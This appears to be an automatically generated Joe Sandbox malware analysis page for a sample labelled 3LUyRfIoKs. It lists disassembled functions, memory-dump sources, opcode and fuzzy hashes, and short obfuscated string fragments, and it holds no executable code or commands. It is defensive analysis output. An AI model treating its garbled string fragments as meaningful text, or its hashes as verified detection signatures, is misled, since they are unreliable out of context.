                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: *,-"$3F&D$JyTK$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$L4$L4
                                                                                                                                                                                                                                                • API String ID: 0-2746398225
                                                                                                                                                                                                                                                • Opcode ID: 53d0bf3660ccd4b6d0e132953caae5b66a250c68e63a54eb4f5c753d845670d4
                                                                                                                                                                                                                                                • Instruction ID: b3ed05fc407b1fbfbbe272686ea6b747a371d32bff04522b2765a163e96c2e91
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53d0bf3660ccd4b6d0e132953caae5b66a250c68e63a54eb4f5c753d845670d4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 574204726082908FD724CF28D8917AFB7E6BFD6314F19893CD4D98B296D7359806CB42
                                                                                                                                                                                                                                                Function 00C55275 Relevance: 11.6, Strings: 8, Instructions: 1626COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: z{w$3uO$3uO$3uO$>h{w$[*j$$,_}${Z
                                                                                                                                                                                                                                                • API String ID: 0-2657773319
                                                                                                                                                                                                                                                • Opcode ID: 56eda4826374ed6763e8c208f82d1d4fcb8d2488a27573e965d326f4b4dee48b
                                                                                                                                                                                                                                                • Instruction ID: 8c901278f449eec002fb231db2c1da81595be48a159c08aebd14ce475f72e5c6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 56eda4826374ed6763e8c208f82d1d4fcb8d2488a27573e965d326f4b4dee48b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0BB238F3A0C2049FE3046E2DEC8567AB7E9EF94720F1A493DEAC5C7744EA7558018792
                                                                                                                                                                                                                                                Function 00AB747D Relevance: 10.0, APIs: 4, Strings: 1, Instructions: 1238COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: _^]\
                                                                                                                                                                                                                                                • API String ID: 0-3116432788
                                                                                                                                                                                                                                                • Opcode ID: 1d8c31512e2007261356927b50f79d5051b81e42b06658ddd0752c10eaf3c724
                                                                                                                                                                                                                                                • Instruction ID: ac0f4529509fafdae4ae86e7f368a5f01339855f81a4ab6964f29a2afc8d61a5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d8c31512e2007261356927b50f79d5051b81e42b06658ddd0752c10eaf3c724
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 558246715083518BC724CF28C8917AFB7E1FFD9364F198A6CE8D59B2A6E7748805CB42
                                                                                                                                                                                                                                                Function 00AA9310 Relevance: 9.2, Strings: 7, Instructions: 431COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ;"I$,6.2$A$FM$PTvu$WAg.$cbrn
                                                                                                                                                                                                                                                • API String ID: 0-3116088196
                                                                                                                                                                                                                                                • Opcode ID: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
                                                                                                                                                                                                                                                • Instruction ID: 6005ce11db38c14aae38769b8c496db4f2d52fddf50f2c7c196834f527ee2725
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DEC10471A4C3D54BD322CF6994A076BFFD19FD7210F084AACE4D51B386D365890ACB92
                                                                                                                                                                                                                                                Function 00C5A32E Relevance: 9.0, Strings: 6, Instructions: 1539COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: #!zc$C0N$O6,>$U s$[Dy}$~7
                                                                                                                                                                                                                                                • API String ID: 0-1068904081
                                                                                                                                                                                                                                                • Opcode ID: a40f91384055a6071a1547cdd8a9240da60a723d1ac95a0126b4609da80a9663
                                                                                                                                                                                                                                                • Instruction ID: 3a1feb4c080a4170b9689c90de2e2543162a270d720806b4edb17788b95f5de1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a40f91384055a6071a1547cdd8a9240da60a723d1ac95a0126b4609da80a9663
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3BA2F4F3A0C2049FE3046E2DEC8567AFBE9EF94720F1A493DEAC583744E63558058697
                                                                                                                                                                                                                                                Function 00AC81CC Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 593COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00AC84BD
                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00AC85B4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                • String ID: LF7Y$_^]\
                                                                                                                                                                                                                                                • API String ID: 237503144-3688711800
                                                                                                                                                                                                                                                • Opcode ID: b06b1e6aaa4717bde48c905bbcfe6c66bf309627461466bdf3823e393475cbec
                                                                                                                                                                                                                                                • Instruction ID: 613fd8b3c1b2a5a1fdfb582305adcaa8856234e3c8f54e9e49d4f8c69d34be00
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b06b1e6aaa4717bde48c905bbcfe6c66bf309627461466bdf3823e393475cbec
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD22D271908381CFD724CF28D890B2FB7E1BF85310F1A4A6CE5955B2A1D7359A52CB52
                                                                                                                                                                                                                                                Function 00AC83D8 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 542COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00AC84BD
                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00AC85B4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                • String ID: LF7Y$_^]\
                                                                                                                                                                                                                                                • API String ID: 237503144-3688711800
                                                                                                                                                                                                                                                • Opcode ID: b07fd69d07e7e16ddde4c890531a0cae97bff5e991e2063b240a936fdf889b9a
                                                                                                                                                                                                                                                • Instruction ID: 25b867129866f9af2356d5e1fef0912d0bad5a0ca9834197bc7a343121d19f72
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b07fd69d07e7e16ddde4c890531a0cae97bff5e991e2063b240a936fdf889b9a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E112D171908381CFD724CF28D880B2FBBE1BF85310F1A4A6CE5995B2A1D735DA46CB52
                                                                                                                                                                                                                                                Function 00AC24E0 Relevance: 6.6, Strings: 5, Instructions: 304COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: "_,Y$.[TU$;GsA$=K0E$pCj]
                                                                                                                                                                                                                                                • API String ID: 0-1171452581
                                                                                                                                                                                                                                                • Opcode ID: df42457feeb5d5775c0ea691bd42c6b848744252f340fb0d6d9a0ec3eefccf77
                                                                                                                                                                                                                                                • Instruction ID: 867c6b6ffdb8b3e2eb96ccd226970eef2d8ddd60a5207a84af2d1c9564c1faa8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df42457feeb5d5775c0ea691bd42c6b848744252f340fb0d6d9a0ec3eefccf77
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D091F2B16083009BD714DF24C891F6BB7B5EF95314F1A882CE98A8B292E775D905CB62
                                                                                                                                                                                                                                                Function 00AB8169 Relevance: 6.5, Strings: 5, Instructions: 299COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 2h?n$7$SP$^`/4$gfff
                                                                                                                                                                                                                                                • API String ID: 0-3257051659
                                                                                                                                                                                                                                                • Opcode ID: 975e3d4f5500bbed1e6e44b9376ea2dbc8fa9ca38e63467850293b8e12a807c3
                                                                                                                                                                                                                                                • Instruction ID: 5f642f60d25796bc96450431f0de98f2ee17ba7d266ced9f24c112480a757fbe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 975e3d4f5500bbed1e6e44b9376ea2dbc8fa9ca38e63467850293b8e12a807c3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1A13772A142504BD324CF28D8517AFB7EAFBD5314F198A3DD485DB392DB388802C781
                                                                                                                                                                                                                                                Function 00AC1340 Relevance: 5.5, Strings: 4, Instructions: 493COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 9deZ$eb$sp${s
                                                                                                                                                                                                                                                • API String ID: 0-3993331145
                                                                                                                                                                                                                                                • Opcode ID: b28df45eb183b322b1e777f3d2803596a73ad5552269ae49aa9bf807a01e520c
                                                                                                                                                                                                                                                • Instruction ID: 8ba03d8f300df80b6c7033f05391e5d8cea48bf566b025e2d212202378fcd710
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b28df45eb183b322b1e777f3d2803596a73ad5552269ae49aa9bf807a01e520c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81D1D3B16183148BC724DF24C891B6BB7E1FFD6354F099A1CE4968B3A1E778D904CB52
                                                                                                                                                                                                                                                Function 00AC91AE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 00AC91DA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
